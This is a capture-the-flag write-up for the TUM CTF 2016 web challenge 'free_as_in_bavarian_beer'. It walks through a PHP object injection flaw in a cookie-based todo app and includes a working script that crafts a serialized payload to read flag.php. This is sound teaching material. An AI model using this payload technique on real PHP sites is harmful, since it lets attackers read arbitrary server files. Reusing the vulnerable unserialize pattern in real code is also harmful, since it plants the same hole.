TUM CTF 2016: free_as_in_bavarian_beer (web 50)
- Category: Web
- Points: 50
- Description:
You have lots of stuff to do? Better start using this cool tool.
http://104.154.70.126:10888
PROTIP: Flag is in flag.php.
Write-up
Since it’s the easiest web challenge, it was easily possible to dump the sourcecode. The app is a simple todo manager, which stores the tasks in a cookie. Reading the code, we quickly noticed the suspicious unserialize:
<?php
if(isset($_COOKIE['todos'])){
$c = $_COOKIE['todos'];
$h = substr($c, 0, 32);
$m = substr($c, 32);
if(md5($m) === $h){
$todos = unserialize($m);
}
}
?>
This is a prime example for PHP Object Injection. In this case it was not necessary to dig deeper into PHP internal classes, since the class in need was conveniently already present; the class used to display the source (and eny other file) …
<?php
Class GPLSourceBloater{
public function __toString()
{
return highlight_file('license.txt', true).highlight_file($this->source, true);
}
}
?>
So we need to build a GPLSourceBloater object, set its source attribute to the desired file (flag.php) and serialize it.
<?
Class GPLSourceBloater{
public function __toString()
{
return highlight_file('license.txt', true).highlight_file($this->source, true);
}
}
$foo = new GPLSourceBloater();
$foo->source = 'flag.php';
$bar = [];
$bar[] = $foo;
$m = serialize($bar);
$h = md5($m);
echo urlencode($h.$m);
?>
After storing the serialized object to a cookie named todos and loading the page again, __toString() did its job and we were presented with the flag:
hxp{Are you glad that at least Java(TM) isn't affected by serialization bugs?}